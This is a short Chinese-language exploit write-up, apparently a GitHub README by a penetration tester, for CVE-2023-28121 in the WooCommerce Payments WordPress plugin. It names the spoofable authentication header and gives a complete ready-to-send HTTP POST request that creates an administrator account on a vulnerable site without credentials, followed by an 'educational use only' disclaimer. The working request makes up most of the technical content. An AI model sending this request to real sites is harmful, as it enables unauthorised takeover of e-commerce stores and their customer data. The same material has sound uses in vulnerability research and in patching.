使用 WooCommerce Payments 插件对 WordPress 严重漏洞的实际利用
使用 WooCommerce Payments 插件对 WordPress 关键漏洞进行实际利用。
CVE-2023-28121 允许通过 REST API 在无需身份验证的情况下创建管理员用户。
📊 受影响的插件拥有数十万安装量,在电商网站中广泛使用。
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
系统接受一个可被篡改的请求头:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
借助这一点,即可在无有效身份验证的情况下发送请求,创建具有高权限的用户。
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ 结果:创建管理员用户
/wp-admin 管理面板👨💻 作者
Luis Eduardo .M.B.S.R
渗透测试人员 / Web 安全
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
仅在受控环境中作教育用途。本人不对第三方如何使用此类知识承担任何责任。